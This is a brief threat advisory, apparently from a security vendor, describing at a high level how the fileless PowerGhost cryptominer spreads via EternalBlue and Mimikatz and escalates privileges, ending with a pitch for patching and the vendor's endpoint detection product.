A fileless cryptocurrency miner dubbed PowerGhost is compromising workstations and servers by utilizing the EternalBlue exploit and Mimikatz. The threat compromises a single computer on a targeted network and may spread to other systems and servers across an organization. The PowerGhost threat was first seen compromising organizations in India, Columbia, Turkey, Europe, and the US.
The threat arrives through exploits or remote administration tools and is an obfuscated PowerShell script with add-on modules for mining. A PowerGhost compromised device uses the EternalBlue exploit to spread around the network and uses Mimikatz to steal account credentials resulting in escalation privileges through CVE-2018-8120. Compromised devices will hijack the central processing unit in order to mine cryptocurrency and the threat may also be used to launch distributed denial-of-service (DDoS) attacks.
This is a high priority vulnerability that is actively being exploited in the wild. Binary Defense customers can protect themselves by keeping their software fully patched and by using the latest Binary Defense security solutions, like Vision Endpoint Detection and Response (EDR), to protect your brand, your data, and your enterprise from fileless malware.